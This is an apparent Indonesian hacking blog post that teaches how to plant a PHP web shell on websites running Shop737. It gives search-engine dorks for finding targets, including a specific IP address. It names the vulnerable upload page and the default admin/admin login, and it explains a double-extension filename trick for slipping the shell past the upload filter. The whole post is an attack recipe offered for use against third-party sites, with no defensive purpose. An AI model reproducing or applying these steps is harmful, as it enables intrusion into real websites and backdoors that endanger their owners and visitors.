Cara Tanam Shell Dengan Teknik Shop737

chmood


Selamat siang Teman-Teman  :)

shop737 itu bug lama tapi baru ngtrend sekarang wkwkwk :v
yaudah langsung saja ke TKP. . .


sebelumnya siapkan shell nya,
shellnya harus di rename terlebih dahulu
kasih .xxxjpg dibelakang shell
menjadi shell.php.xxxjpg


dork via google: intext:"Powered by Shop737"
dork via bing: IP: 103.29.215.201 "/poto/"
note: 103.29.215.201 -> ip bisa di ganti


exploit: /poto/upload.php
contoh: wwwtarget.com/poto/upload.php


saya asumsikan sudah dapat web yang vuln..




www.target.com/poto/








sekarang kita kasih exlpoitnya
jadi wwwtarget.com/poto/upload.php




suruh masukin username sama password


username: admin
password: admin




liat gambar di atas^
upload shell anda tadi yang sebelumnya sudah di rename.
hasilnya www.target.com/poto/[kategori]/shell.php.xxxjpg







Semoga bermanfaat :)

Komentar